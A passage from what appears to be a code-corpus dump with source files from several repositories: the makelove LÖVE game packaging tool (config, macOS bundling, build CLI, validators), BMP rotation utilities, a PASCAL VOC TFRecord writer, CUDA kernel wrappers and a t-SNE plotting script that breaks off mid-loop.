)
def guess_name():
res = subprocess.run(["git", "rev-parse", "--show-toplevel"], capture_output=True)
if res.returncode == 0:
git_root_path = res.stdout.decode("utf-8").strip()
return os.path.basename(git_root_path)
else:
return os.path.basename(os.getcwd())
def get_default_targets():
targets = ["win32", "win64"]
if sys.platform == "linux":
targets.append("appimage")
return targets
def get_conf_filename():
candidates = ["conf.lua", "conf.moon", "conf.ts"]
for name in candidates:
if os.path.isfile(name):
print("Found {}".format(name))
return name
print("Could not find löve config file")
return None
def guess_love_version():
filename = get_conf_filename()
if filename == None:
return None
with open(filename) as f:
conf_lua = f.read()
regex = re.compile(r"(?<!--)\.version\s*=\s*\"(.*)\"")
matches = regex.findall(conf_lua)
if len(matches) == 0:
return None
elif len(matches) > 1:
print(
"Could not determine löve version unambiguously. Candidates: {}".format(
matches
)
)
return None
return matches[0]
def get_default_love_files(build_directory):
if is_inside_git_repo():
return [
"::git-ls-tree::",
"-*/.*",
]
else:
return [
"+*",
"-*/.*",
"-./{}/*".format(build_directory),
]
def validate_config(config):
try:
val.Section(config_params).validate(config)
except ValueError as exc:
sys.exit("Could not parse config:\n{}".format(exc))
def get_raw_config(config_path):
if config_path != None:
if not os.path.isfile(config_path):
sys.exit("Config file '{}' does not exist".format(config_path))
print("Loading config file '{}'".format(config_path))
return load_config_file(config_path)
else:
if os.path.isfile(default_config_name):
print("Loading config from default path '{}'".format(default_config_name))
return load_config_file(default_config_name)
else:
print("No config file found. Using default config.")
return {}
def get_config(config_path):
config = get_raw_config(config_path)
if not "name" in config:
config["name"] = guess_name()
print("Guessing project name as '{}'".format(config["name"]))
if not "love_version" in config:
conf_love_version = guess_love_version()
if conf_love_version:
config["love_version"] = conf_love_version
print(
"Guessed löve version from löve config file: {}".format(
conf_love_version
)
)
else:
config["love_version"] = "11.3" # update this manually here
print("Assuming default löve version '{}'".format(config["love_version"]))
if not "default_targets" in config:
config["default_targets"] = get_default_targets()
if not "build_directory" in config:
config["build_directory"] = "makelove-build"
print("Using default build directory '{}'".format(config["build_directory"]))
if not "love_files" in config:
config["love_files"] = get_default_love_files(config["build_directory"])
print("Using default love_files patterns: {}".format(config["love_files"]))
validate_config(config)
return config
init_config_template = """name = {name}
default_targets = [{default_targets}]
build_directory = {build_directory}
love_files = [
{love_files}
]
"""
def init_config_assistant():
if os.path.isfile(default_config_name):
sys.exit("{} already exists in this directory".format(default_config_name))
if not is_inside_git_repo():
print("If you plan on using git, please initialize the repository first!")
name = prompt("Project name")
default_targets = get_default_targets()
build_directory = prompt("Build directory", "makelove-build")
love_files = get_default_love_files(build_directory)
quote = lambda x: '"' + x.replace('"', '\\"') + '"'
config = init_config_template.format(
name=quote(name),
default_targets=", ".join(map(quote, default_targets)),
build_directory=quote(build_directory),
love_files="\n".join(" " + quote(pat) + "," for pat in love_files),
)
with open(default_config_name, "w") as f:
f.write(config)
print("Configuration written to {}".format(default_config_name))
print("You should probably adjust love_files before you build.")
```
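For reference, a minimal sketch (not taken from the repo) of the dictionary `get_config(None)` falls back to when no `makelove.toml` exists, the project directory `mygame` is not a git repository, and the host is Linux:
```python
# Hypothetical fallback result of get_config(None) under the assumptions above.
fallback_config = {
    "name": "mygame",                        # guessed from the directory name
    "love_version": "11.3",                  # hard-coded default in get_config
    "default_targets": ["win32", "win64", "appimage"],  # "appimage" only added on Linux
    "build_directory": "makelove-build",
    "love_files": ["+*", "-*/.*", "-./makelove-build/*"],
}
```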
#### File: makelove/makelove/macos.py
```python
import io
import os
import plistlib
import struct
import sys
from datetime import datetime
from zipfile import ZipFile
from urllib.request import urlopen, urlretrieve, URLError
from PIL import Image
from .util import eprint, get_default_love_binary_dir, get_download_url
def download_love(version, platform):
"""
Note, mac builds are stored as zip files because extracting them
would lose data about symlinks when building on windows
"""
target_path = get_default_love_binary_dir(version, platform)
print("Downloading love binaries to: '{}'".format(target_path))
os.makedirs(target_path, exist_ok=True)
try:
download_url = get_download_url(version, platform)
print("Downloading '{}'..".format(download_url))
urlretrieve(download_url, os.path.join(target_path, "love.zip"))
except URLError as exc:
eprint("Could not download löve: {}".format(exc))
eprint(
"If there is in fact no download on GitHub for this version, specify 'love_binaries' manually."
)
sys.exit(1)
print("Download complete")
def write_file(pkg, name, content):
if isinstance(pkg, str):
mode = "w" if isinstance(content, str) else "wb"
with open(name, mode) as f:
f.write(content)
elif isinstance(pkg, ZipFile):
pkg.writestr(name, content)
def make_icns(iconfile, icon_image_file):
"""
iconfile: an open file to write the ICNS file contents into (mode: wb)
icon_image: a PIL.Image object of the icon image
Based on code from learn-python.com:
https://learning-python.com/cgi/showcode.py?name=pymailgui-products/unzipped/build/build-icons/iconify.py
"""
icon_image = Image.open(icon_image_file)
# must all be square (width=height) and of standard pixel sizes
width, height = icon_image.size # a 2-tuple
if width != height:
eprint("Invalid image size, discarded: %d x %d." % (width, height))
sys.exit(1)
sizetotypes = {
16: [b"icp4"], # 16x16 std only (no 8x8@2x)
32: [b"icp5", b"ic11"], # 32x32 std -AND- 16x16@2x high
64: [b"icp6", b"ic12"], # 64x64 std -AND- 32x32@2x high
128: [b"ic07"], # 128x128 std only (no 64x64@2x)
256: [b"ic08", b"ic13"], # 256x256 std -AND- 128x128@2x high
512: [b"ic09", b"ic14"], # 512x512 std -AND- 256x256@2x high
1024: [b"ic10"], # 1024x1024 (10.7) = 512x512@2x high (10.8)
}
imagedatas = []
for size_px, icontypes in sizetotypes.items():
img = icon_image.resize((size_px, size_px), Image.LANCZOS)
with io.BytesIO() as img_data_f:
img.save(img_data_f, "png")
for icontype in icontypes:
imagedatas.append([icontype, img_data_f.getvalue()])
# 1) HEADER: 4-byte "magic" + 4-byte filesize (including header itself)
filelen = 8 + sum(len(imagedata) + 8 for (_, imagedata) in sorted(imagedatas))
iconfile.write(b"icns")
iconfile.write(struct.pack(">I", filelen))
# 2) IMAGE TYPE+LENGTH+BYTES: packed into rest of icon file sequentially
for icontype, imagedata in imagedatas:
# data length includes type and length fields (4+4)
iconfile.write(icontype) # 4 byte type
iconfile.write(struct.pack(">I", 8 + len(imagedata))) # 4-byte length
iconfile.write(imagedata) # and the image
def get_game_icon_content(config):
# Mac icons are not supposed to take up the full image area and generally
# have shadows, etc - allow users to provide a different design but fall
# back on the generic icon_file setting
icon_file = config.get("macos", {}).get("icon_file")
if icon_file is None:
icon_file = config.get("icon_file", None)
elif not os.path.isfile(icon_file):
sys.exit(f"Couldn't find macOS icon_file at {icon_file}")
if icon_file is None:
icon_file = config.get("icon_file", None)
elif not os.path.isfile(icon_file):
sys.exit(f"Couldn't find icon_file at {icon_file}")
if not icon_file:
return False
with io.BytesIO() as icns_f, open(icon_file, "rb") as icon_img_f:
icon_key = f"{config['name']}.app/Contents/Resources/icon-{config['name']}.icns"
if icon_file.lower().endswith(".png"):
make_icns(icns_f, icon_img_f)
return icns_f.getvalue()
else:
return icon_img_f.read()
def get_info_plist_content(config, version):
plist = {
"BuildMachineOSBuild": "19B88",
"CFBundleDevelopmentRegion": "English",
"CFBundleExecutable": "love",
"CFBundleIconFile": "icon.icns",
"CFBundleInfoDictionaryVersion": "6.0",
"CFBundlePackageType": "APPL",
"CFBundleSignature": "LoVe",
"CFBundleSupportedPlatforms": ["MacOSX"],
"DTCompiler": "com.apple.compilers.llvm.clang.1_0",
"DTPlatformBuild": "11C504",
"DTPlatformVersion": "GM",
"DTSDKBuild": "19B90",
"DTSDKName": "macosx10.15",
"DTXcode": "1130",
"DTXcodeBuild": "11C504",
"LSApplicationCategoryType": "public.app-category.games",
"LSMinimumSystemVersion": "10.7",
"NSHighResolutionCapable": True,
"NSPrincipalClass": "NSApplication",
"NSSupportsAutomaticGraphicsSwitching": False,
# dynamic defaults
"CFBundleShortVersionString": version or config["love_version"],
"CFBundleName": config["name"],
"NSHumanReadableCopyright": "© 2006-2020 LÖVE Development Team",
"CFBundleIdentifier": f"tld.yourgamename",
}
if "macos" in config and "app_metadata" in config["macos"]:
metadata = config["macos"]["app_metadata"]
plist.update(metadata)
return plistlib.dumps(plist)
def build_macos(config, version, target, target_directory, love_file_path):
if target in config and "love_binaries" in config[target]:
love_binaries = config[target]["love_binaries"]
else:
assert "love_version" in config
print("No love binaries specified for target {}".format(target))
love_binaries = get_default_love_binary_dir(config["love_version"], target)
if os.path.isdir(love_binaries):
print("Love binaries already present in '{}'".format(love_binaries))
else:
download_love(config["love_version"], target)
src = os.path.join(love_binaries, "love.zip")
dst = os.path.join(target_directory, f"{config['name']}-{target}.zip")
with open(src, "rb") as lovef, ZipFile(lovef) as love_binary_zip, open(
dst, "wb+"
) as outf, ZipFile(outf, mode="w") as app_zip, open(
love_file_path, "rb"
) as love_zip:
for zipinfo in love_binary_zip.infolist():
if not zipinfo.filename.startswith("love.app/"):
                eprint("Got bad or unexpectedly formatted love zip file")
sys.exit(1)
# for getting files out of the original love archive
orig_filename = zipinfo.filename
# rename app from "love.app" to "cool game.app"
zipinfo.filename = config["name"] + zipinfo.filename[len("love") :]
# makes the modification time on the app correct
zipinfo.date_time = tuple(datetime.now().timetuple()[:6])
if orig_filename == "love.app/Contents/Resources/GameIcon.icns":
continue # not needed for game distributions
elif orig_filename == "love.app/Contents/Resources/Assets.car":
continue # not needed for game distributions
elif orig_filename == "love.app/Contents/Resources/OS X AppIcon.icns":
# hack: change name to make macos pick up the icon
zipinfo = f"{config['name']}.app/Contents/Resources/icon.icns"
content = get_game_icon_content(config)
if not content:
content = love_binary_zip.read(orig_filename)
elif orig_filename == "love.app/Contents/Info.plist":
app_zip.writestr(
zipinfo.filename, get_info_plist_content(config, version)
)
continue
else:
content = love_binary_zip.read(orig_filename)
app_zip.writestr(zipinfo, content)
loveZipKey = f"{config['name']}.app/Contents/Resources/{config['name']}.love"
app_zip.writestr(loveZipKey, love_zip.read())
```
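A minimal usage sketch of `make_icns`; the import path and file names below are assumptions, not taken from the repo:
```python
from makelove.macos import make_icns  # import path assumed

# icon_512.png (assumed name) must be a square PNG; icon.icns is written next to it.
with open("icon.icns", "wb") as icns_f, open("icon_512.png", "rb") as png_f:
    make_icns(icns_f, png_f)
```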
#### File: makelove/makelove/makelove.py
```python
import argparse
import os
import shutil
import sys
import json
import subprocess
from email.utils import formatdate
import zipfile
import re
import pkg_resources
from .config import get_config, all_targets, init_config_assistant
from .hooks import execute_hook
from .filelist import FileList
from .jsonfile import JsonFile
from .windows import build_windows
from .linux import build_linux
from .macos import build_macos
from .lovejs import build_lovejs
all_hooks = ["prebuild", "postbuild"]
# Sadly, argparse cannot combine nargs="*" with choices; it errors unless at least one argument is provided
def _choices(values):
def f(s):
if s not in values:
raise argparse.ArgumentTypeError(
"Invalid choice. Options: {}".format(", ".join(values))
)
return s
return f
def files_in_dir(dir_path):
ret = []
for root, _dirs, files in os.walk(dir_path):
for f in files:
ret.append(os.path.join(root, f))
return ret
# Obviously this cannot bump everything, just bump the trailing number
def bump_version(version):
m = re.search(r"\d+$", version)
if not m:
sys.exit("Could not bump version '{}'".format(version))
num = int(m.group(0)) + 1
return version[: m.start(0)] + str(num)
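# Illustration (not in the original source): bump_version("1.0.9") returns "1.0.10",
# bump_version("v7") returns "v8", and a version with no trailing digits (e.g. "alpha")
# makes the function exit with an error.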
def get_build_log_path(build_directory):
return os.path.join(build_directory, ".makelove-buildlog")
def prepare_build_directory(args, config, version):
assert "build_directory" in config
build_directory = config["build_directory"]
    versioned_build = version is not None
if versioned_build:
# Pretend the build directory is the version directory
# I think this is somewhat hacky, but also nice at the same time
build_directory = os.path.join(build_directory, version)
if os.path.isdir(build_directory):
# If no version is specified, overwrite by default
built_targets = os.listdir(build_directory)
building_target_again = any(target in built_targets for target in args.targets)
# If the targets being built have not been built before, it should be fine to not do anything
# The deletion/creation of the target directories is handled in main() (they are just deleted if they exist).
if versioned_build and building_target_again and not args.force:
sys.exit(
"Cannot rebuild an already built version + target combination. Remove it manually first or pass --force to overwrite it"
)
elif os.path.exists(build_directory):
sys.exit("Build directory exists and is not a directory")
else:
os.makedirs(build_directory)
return build_directory
def execute_hooks(hook, config, version, targets, build_directory):
if "hooks" in config and hook in config["hooks"]:
for command in config["hooks"][hook]:
new_config = execute_hook(
command, config, version, targets, build_directory
)
config.clear()
config.update(new_config)
def git_ls_tree(path=".", visited=None):
p = os.path
    if visited is None:
visited = set()
rpath = p.realpath(path)
if rpath in visited:
sys.exit("Symlink loop detected!")
else:
visited.add(rpath)
ls_tree = (
subprocess.check_output(
["git", "ls-tree", "-r", "--name-only", "HEAD"], cwd=path
)
.decode("utf-8")
.splitlines()
)
out = []
for item in ls_tree:
item_path = p.join(path, item)
if p.islink(item_path) and p.isdir(item_path):
out.extend(git_ls_tree(item_path, visited))
else:
out.append(item_path)
return out
def assemble_game_directory(args, config, game_directory):
if os.path.isdir(game_directory):
shutil.rmtree(game_directory)
os.makedirs(game_directory)
file_list = FileList(".")
for rule in config["love_files"]:
if rule == "+::git-ls-tree::" or rule == "::git-ls-tree::":
ls_tree = git_ls_tree(".")
for item in ls_tree:
try:
file_list.include_raw(item)
except FileNotFoundError:
sys.exit("Could not find git-tracked file '{}'".format(item))
elif rule[0] == "-":
file_list.exclude(rule[1:])
elif rule[0] == "+":
file_list.include(rule[1:])
else:
file_list.include(rule)
if args.verbose:
print(".love files:")
for fname in file_list:
if args.verbose:
print(fname)
dest_path = os.path.join(game_directory, fname)
os.makedirs(os.path.dirname(dest_path), exist_ok=True)
shutil.copyfile(fname, dest_path)
def create_love_file(game_dir, love_file_path):
love_archive = zipfile.ZipFile(love_file_path, "w")
for path in files_in_dir(game_dir):
arcname = os.path.normpath(os.path.relpath(path, game_dir))
love_archive.write(path, arcname=arcname)
love_archive.close()
def get_build_version(args, config):
build_log_path = get_build_log_path(config["build_directory"])
# Bump version if we are doing a versioned build and no version is specified
were_versioned_builds_made = os.path.isfile(build_log_path)
    if were_versioned_builds_made and args.version is None:
print(
"Versioned builds were made in the past, but no version was specified for this build. Bumping last built version."
)
with open(build_log_path) as f:
build_log = json.load(f)
last_built_version = build_log[-1]["version"]
return bump_version(last_built_version)
return args.version
def get_targets(args, config):
targets = args.targets
if len(targets) == 0:
assert "default_targets" in config
targets = config["default_targets"]
# use this lame loop to make unique but keep target order
unique_targets = []
for target in targets:
if target not in unique_targets:
unique_targets.append(target)
targets = unique_targets
return targets
def main():
parser = argparse.ArgumentParser(prog="makelove")
parser.add_argument(
"--init",
action="store_true",
help="Start assistant to create a new configuration.",
)
parser.add_argument(
"--config",
help="Specify config file manually. If not specified 'makelove.toml' in the current working directory is used.",
)
parser.add_argument(
"-d",
"--disable-hook",
default=[],
dest="disabled_hooks",
action="append",
choices=all_hooks + ["all"],
)
parser.add_argument(
"--force",
dest="force",
action="store_true",
help="If doing a versioned build, specify this to overwrite a target that was already built.",
)
parser.add_argument(
"--resume",
action="store_true",
help="If doing an unversioned build, specify this to not rebuild targets that were already built.",
)
parser.add_argument(
"--verbose",
action="store_true",
help="Display more information (files included in love archive)",
)
# Restrict version name format somehow? A git refname?
parser.add_argument(
"-n",
"--version-name",
dest="version",
help="Specify the name of the version to be built.",
)
parser.add_argument(
"--check",
action="store_true",
        help="Only load config and check some arguments, then exit without doing anything. This is mostly useful for development.",
)
parser.add_argument(
"--version",
dest="display_version",
action="store_true",
help="Output the makelove version and exit.",
)
parser.add_argument(
"targets",
nargs="*",
type=_choices(all_targets),
default=[],
help="Options: {}".format(", ".join(all_targets)),
)
args = parser.parse_args()
if args.display_version:
print("makelove {}".format(pkg_resources.get_distribution("makelove").version))
sys.exit(0)
if not os.path.isfile("main.lua"):
print(
"There is no main.lua present in the current directory! Unless you use MoonScript, this might be a mistake."
)
if args.init:
init_config_assistant()
sys.exit(0)
config = get_config(args.config)
version = get_build_version(args, config)
    if version is not None:
print("Building version '{}'".format(version))
if "all" in args.disabled_hooks:
args.disabled_hooks = all_hooks
if args.check:
print("Exiting because --check was passed.")
sys.exit(0)
build_directory = prepare_build_directory(args, config, version)
targets = get_targets(args, config)
if sys.platform.startswith("win") and "appimage" in targets:
sys.exit("Currently AppImages can only be built on Linux and WSL2!")
build_log_path = get_build_log_path(config["build_directory"])
print("Building targets:", ", ".join(targets))
    if version is not None:
with JsonFile(build_log_path, indent=4) as build_log:
build_log.append(
{
"version": version,
"build_time": formatdate(localtime=True),
"targets": targets,
"completed": False,
}
)
    if "prebuild" not in args.disabled_hooks:
execute_hooks("prebuild", config, version, targets, build_directory)
love_directory = os.path.join(build_directory, "love")
love_file_path = os.path.join(love_directory, "{}.love".format(config["name"]))
game_directory = os.path.join(love_directory, "game_directory")
    # This holds for both the löve file and the targets below:
# If we do a versioned build and reached this place, force/--force
# was passed, so we can just delete stuff.
rebuild_love = version != None or not args.resume
if not os.path.isfile(love_file_path) or rebuild_love:
print("Assembling game directory..")
assemble_game_directory(args, config, game_directory)
if not os.path.isfile(os.path.join(game_directory, "main.lua")):
sys.exit(
"Your game directory does not contain a main.lua. This will result in a game that can not be run."
)
create_love_file(game_directory, love_file_path)
print("Created {}".format(love_file_path))
if config.get("keep_game_directory", False):
print("Keeping game directory because 'keep_game_directory' is true")
else:
shutil.rmtree(game_directory)
else:
print(".love file already exists. Not rebuilding.")
for target in targets:
print(">> Building target {}".format(target))
target_directory = os.path.join(build_directory, target)
# If target_directory is not a directory, let it throw an exception
# We can overwrite here
if os.path.exists(target_directory):
shutil.rmtree(target_directory)
os.makedirs(target_directory)
if target == "win32" or target == "win64":
build_windows(config, version, target, target_directory, love_file_path)
elif target == "appimage":
build_linux(config, version, target, target_directory, love_file_path)
elif target == "macos":
build_macos(config, version, target, target_directory, love_file_path)
elif target == "lovejs":
build_lovejs(config, version, target, target_directory, love_file_path)
print("Target {} complete".format(target))
    if "postbuild" not in args.disabled_hooks:
execute_hooks("postbuild", config, version, targets, build_directory)
    if version is not None:
with JsonFile(build_log_path, indent=4) as build_log:
build_log[-1]["completed"] = True
if __name__ == "__main__":
main()
```
#### File: makelove/makelove/validators.py
```python
class Section(object):
def __init__(self, params):
self.params = params
def validate(self, obj):
if not isinstance(obj, dict):
raise ValueError
for param in obj:
if param not in self.params:
raise ValueError("Unknown parameter '{}'".format(param))
try:
self.params[param].validate(obj[param])
except ValueError as exc:
if len(str(exc)) == 0:
raise ValueError(
"Invalid value for parameter '{}'. Expected: {}".format(
param, self.params[param].description()
)
)
else:
raise
return obj
def description(self):
return "Section"
class Bool(object):
def validate(self, obj):
if not isinstance(obj, bool):
raise ValueError
return obj
def description(self):
return "Boolean"
class String(object):
def validate(self, obj):
if not isinstance(obj, str):
raise ValueError
return obj
def description(self):
return "String"
class Any(object):
def validate(self, obj):
return obj
def description(self):
return "Any value"
class Choice(object):
def __init__(self, *choices):
self.choices = choices
def validate(self, obj):
        if obj not in self.choices:
raise ValueError
return obj
def description(self):
return "One of [{}]".format(", ".join(self.choices))
# This validator is mostly used for documentation, since on Linux
# for example almost anything could be a path
class Path(object):
def validate(self, obj):
if not isinstance(obj, str):
raise ValueError
return obj
def description(self):
return "Path"
# Same as path
class Command(object):
def validate(self, obj):
if not isinstance(obj, str):
raise ValueError
return obj
def description(self):
return "Command"
class List(object):
def __init__(self, value_validator):
self.value_validator = value_validator
def validate(self, obj):
if not isinstance(obj, list):
raise ValueError
for value in obj:
self.value_validator.validate(value)
return obj
def description(self):
return "List({})".format(self.value_validator.description())
class Dict(object):
def __init__(self, key_validator, value_validator):
self.key_validator = key_validator
self.value_validator = value_validator
def validate(self, obj):
if not isinstance(obj, dict):
raise ValueError
for k, v in obj.items():
self.key_validator.validate(k)
self.value_validator.validate(v)
return obj
def description(self):
return "Dictionary(key = {}, value = {})".format(
self.key_validator.description(), self.value_validator.description()
)
class Option(object):
def __init__(self, *option_validators):
self.option_validators = option_validators
def validate(self, obj):
for option in self.option_validators:
try:
option.validate(obj)
return obj
except ValueError:
pass
raise ValueError
def description(self):
return "Option({})".format(
", ".join(option.description() for option in self.option_validators)
)
def ValueOrList(value_validator):
return Option(value_validator, List(value_validator))
``` |
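A short usage sketch of these validators; the `config_params` table below is invented for illustration (the real one lives in makelove's config module), and the import path is assumed:
```python
from makelove.validators import Section, String, List, Choice, Dict  # import path assumed

config_params = {
    "name": String(),
    "default_targets": List(Choice("win32", "win64", "appimage", "macos", "lovejs")),
    "love_files": List(String()),
    "windows": Section({"exe_metadata": Dict(String(), String())}),
}

# A valid config passes through unchanged...
Section(config_params).validate({"name": "mygame", "default_targets": ["win64"]})

# ...while an unknown key raises ValueError.
try:
    Section(config_params).validate({"nam": "typo"})
except ValueError as exc:
    print(exc)  # Unknown parameter 'nam'
```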
{
"source": "jiabailie/image-processing",
"score": 2
} |
#### File: summer/base/bmp_struct_header.py
```python
from summer.tools.utils import Utils
class BmpStructHeader:
def __init__(self):
self.biSize = Utils.i_to_bytes(0, 4) # bmp header size
self.biWidth = Utils.i_to_bytes(0, 4)
self.biHeight = Utils.i_to_bytes(0, 4)
self.biPlanes = Utils.i_to_bytes(0, 2) # default 1
        self.biBitCount = Utils.i_to_bytes(0, 2)  # how many bits one pixel occupies
self.biCompression = Utils.i_to_bytes(0, 4)
self.biSizeImage = Utils.i_to_bytes(0, 4)
self.biXPelsPerMeter = Utils.i_to_bytes(0, 4)
self.biYPelsPerMeter = Utils.i_to_bytes(0, 4)
self.biClrUsed = Utils.i_to_bytes(0, 4)
self.biClrImportant = Utils.i_to_bytes(0, 4)
```
#### File: summer/operations/rotating.py
```python
import math
from summer.tools.utils import Utils
from summer.base.bmp import Bmp
class Rotating(Bmp):
def __init__(self):
super().__init__()
def rotate(self):
self.rotate_with_degree(90)
"""
reference: http://blog.csdn.net/liyuan02/article/details/6750828
    attention: inside the loop, the x index corresponds to y in the actual bmp, and vice versa.
"""
def rotate_with_degree(self, degree):
cos_degree = math.cos(math.radians(degree))
sin_degree = math.sin(math.radians(degree))
h = math.ceil(self.height * cos_degree
+ self.width * sin_degree)
w = math.ceil(self.height * sin_degree
+ self.width * cos_degree)
h = abs(h)
w = abs(w)
if w % 4 != 0:
w -= w % 4
dx = -0.5 * w * cos_degree - 0.5 * h * sin_degree + 0.5 * self.width
dy = 0.5 * w * sin_degree - 0.5 * h * cos_degree + 0.5 * self.height
new_bits = [b''] * w * h * 3
for x in range(0, h):
for y in range(0, w):
x0 = y * cos_degree + x * sin_degree + dx
y0 = -y * sin_degree + x * cos_degree + dy
src_index = round(y0) * self.width_step + round(x0) * self.bit_count
dst_index = x * w * self.bit_count + y * self.bit_count
if len(self.bits) - self.bit_count > src_index >= 0:
new_bits[dst_index + 2] = self.bits[src_index + 2]
new_bits[dst_index + 1] = self.bits[src_index + 1]
new_bits[dst_index] = self.bits[src_index]
else:
new_bits[dst_index + 2] = Utils.i_to_bytes(255, 1)
new_bits[dst_index + 1] = Utils.i_to_bytes(255, 1)
new_bits[dst_index] = Utils.i_to_bytes(255, 1)
self.bits = new_bits
self.biWidth = Utils.i_to_bytes(w, 4)
self.biHeight = Utils.i_to_bytes(h, 4)
```
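A quick standalone check of the bounding-box arithmetic used in `rotate_with_degree`; the numbers are illustrative only:
```python
import math

# A 200x100 (width x height) image rotated by 30 degrees:
degree, width, height = 30, 200, 100
cos_d = math.cos(math.radians(degree))
sin_d = math.sin(math.radians(degree))
h = abs(math.ceil(height * cos_d + width * sin_d))  # 187
w = abs(math.ceil(height * sin_d + width * cos_d))  # 224, already a multiple of 4
print(h, w)
```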
#### File: summer/tools/utils.py
```python
class Utils:
@staticmethod
def i_to_bytes(number, length, byteorder='little'):
return number.to_bytes(length, byteorder)
@staticmethod
def bytes_to_i(mbytes, byteorder='little'):
return int.from_bytes(mbytes, byteorder)
``` |
{
"source": "jiabaocui/SEGS",
"score": 2
} |
#### File: SEGS/datasets/pasval_voc_writer.py
```python
import os
import random
import xml.etree.ElementTree as ET
import tensorflow as tf
def int64_feature(value):
"""Wrapper for inserting int64 features into Example proto.
"""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def float_feature(value):
"""Wrapper for inserting float features into Example proto.
"""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto.
"""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(bytes_list=tf.train.BytesList(value=value))
DEFUALT_PATHS = {
'images': '/mnt/disk/chenyifeng/VOC2012/JPEGImages',
'annotations': '/mnt/disk/chenyifeng/VOC2012/Annotations',
'segmentations': '/mnt/disk/chenyifeng/VOC2012/SegmentationClassAug'
}
class PascalVocWriter:
"""
PASCAL VOC 2012 DataSet to TF record Writer
"""
def __init__(self, paths=DEFUALT_PATHS):
self.img_path = paths['images']
self.ano_path = paths['annotations']
self.sgm_path = paths['segmentations']
def convert_to_example(self, file_name):
img_path = os.path.join(self.img_path, file_name + '.jpg')
ano_path = os.path.join(self.ano_path, file_name + '.xml')
sgm_path = os.path.join(self.sgm_path, file_name + '.png')
img_data = tf.gfile.FastGFile(img_path, 'rb').read()
sgm_data = tf.gfile.FastGFile(sgm_path, 'rb').read()
# img_data = imread(img_path).tostring()
# sgm_data = imread(sgm_path).tostring()
anno_tree = ET.parse(ano_path)
anno_root = anno_tree.getroot()
# is_sgmt = int(anno_root.find('segmented').text)
# if is_sgmt == 0:
# print('{} is not a Segmentation Sample. So Skipped'.format(file_name))
size = anno_root.find('size')
shape = [int(size.find('height').text),
int(size.find('width').text),
int(size.find('depth').text)]
image_format = b'JPEG'
segment_format = b'PNG'
example = tf.train.Example(
features=tf.train.Features(
feature={
'image/name':bytes_feature(file_name.encode()),
'image/height': int64_feature(shape[0]),
'image/width': int64_feature(shape[1]),
'image/channels': int64_feature(shape[2]),
'image/shape': int64_feature(shape),
'image/format': bytes_feature(image_format),
'image/encoded': bytes_feature(img_data),
'label/format': bytes_feature(segment_format),
'label/encoded': bytes_feature(sgm_data)
}
)
)
return example
def add_to_record(self, file_name, tfrecord_writer):
example = self.convert_to_example(file_name)
tfrecord_writer.write(example.SerializeToString())
def run(self, pic_names, output_dir, shuffling=False, size=300):
if shuffling:
random.seed(1314)
random.shuffle(pic_names)
total_num = len(pic_names)
for start in range(0, total_num, size):
tf_filename = '%s/%03d.tfrecord' % (output_dir, start // size)
tf_recorder = tf.python_io.TFRecordWriter(tf_filename)
print('=>' * (start * 5 // total_num) + '{:.0f}% Finished'.format(start / total_num * 100))
            for pic_idx in range(start, min(start + size, total_num)):
pic_name = pic_names[pic_idx]
self.add_to_record(pic_name, tf_recorder)
print('=>' * 5 + '{:.0f}% Finished'.format(100))
def convert_val():
writer = PascalVocWriter()
pic_names = open('/mnt/disk/chenyifeng/VOC2012/ImageSets/Segmentation/val.txt').readlines()
pic_names = [i.strip(' \n') for i in pic_names]
writer.run(pic_names, output_dir='/mnt/disk/chenyifeng/VOC2012/tf_segments/tf_records/val')
def convert_train():
writer = PascalVocWriter()
pic_names = open('/mnt/disk/chenyifeng/VOC2012/ImageSets/Segmentation/train.txt').readlines()
pic_names = [i.strip(' \n') for i in pic_names]
writer.run(pic_names, output_dir='/mnt/disk/chenyifeng/VOC2012/tf_segments/tf_records/train')
if __name__ == '__main__':
# convert_train()
convert_val()
``` |
{
"source": "JIABI/GhostShiftAddNet",
"score": 3
} |
#### File: unoptimized/kernels/kernels.py
```python
import torch
try:
import unoptimized_cuda
except:
print("Unable to import CUDA unoptimized kernels")
def linear(input, weight, bias):
out = torch.zeros([input.size(0), weight.size(0)], dtype=torch.float, device=torch.device('cuda:0'))
if bias is not None:
unoptimized_cuda.UNOPTIMIZED_LINEAR(input, weight, bias, out)
else:
temp = torch.zeros([weight.size(0)], dtype=torch.float, device=torch.device('cuda:0'))
unoptimized_cuda.UNOPTIMIZED_LINEAR(input, weight, temp, out)
return out
def conv2d(input, weight, bias, stride, padding):
if len(stride) == 1:
strides_h = stride[0]
strides_w = stride[0]
else:
strides_h = stride[0]
strides_w = stride[1]
out_height = int((input.size(2) - weight.size(2)) / strides_h +1)
out_width = int((input.size(3) - weight.size(3)) / strides_w +1)
out = torch.zeros([input.size(0), weight.size(0), out_height, out_width], dtype=torch.float, device=torch.device('cuda:0'))
if bias is not None:
unoptimized_cuda.UNOPTIMIZED_CONV(input, weight, bias, out, stride, padding )
else:
temp = torch.zeros([weight.size(0)], dtype=torch.float, device=torch.device('cuda:0'))
unoptimized_cuda.UNOPTIMIZED_CONV(input, weight, temp, out, stride, padding )
return out
```
#### File: GhostShiftAddNet/tsne_vis/visual_tsne.py
```python
import numpy as np
import gzip
# import cPickle
import pickle as cPickle
import argparse
#Import scikitlearn for machine learning functionalities
import sklearn
from sklearn.manifold import TSNE
parser = argparse.ArgumentParser(description='PyTorch TSNE Plot')
parser.add_argument('--save_dir', type=str, default='resnet20_shiftadd_FIX8', help='path to save directory')
parser.add_argument('--scratch', action='store_false', help='whether generate output_2d from scratch')
parser.add_argument('--dim_3d', action='store_true', help='whether to show 3D perspective')
args = parser.parse_args()
save_dir = args.save_dir
font_board = 2
output = np.load(save_dir + '/output.npy').astype(np.float32)
# data = np.load(save_dir + '/data.npy')
target = np.load(save_dir + '/target.npy')
# print('data shape: ', data.shape)
print('target shape: ', target.shape)
print('output shape: ', output.shape)
if not args.dim_3d:
    if args.scratch:
        output_2d = TSNE(perplexity=30).fit_transform(output)
        np.save(save_dir + '/output_2d.npy', output_2d)  # , allow_pickle=False)
    else:
        output_2d = np.load(save_dir + '/output_2d.npy')
target = target.reshape(target.shape[0])
import matplotlib.pyplot as plt
import matplotlib.patheffects as pe
fig = plt.figure(figsize=(8,6))
# ax = plt.subplot(aspect='equal')
ax = fig.add_subplot(1,1,1)
sc = ax.scatter(output_2d[:, 0], output_2d[:, 1], lw=0, s=10, c=target)
# Add the labels for each digit.
txts = []
for i in range(10):
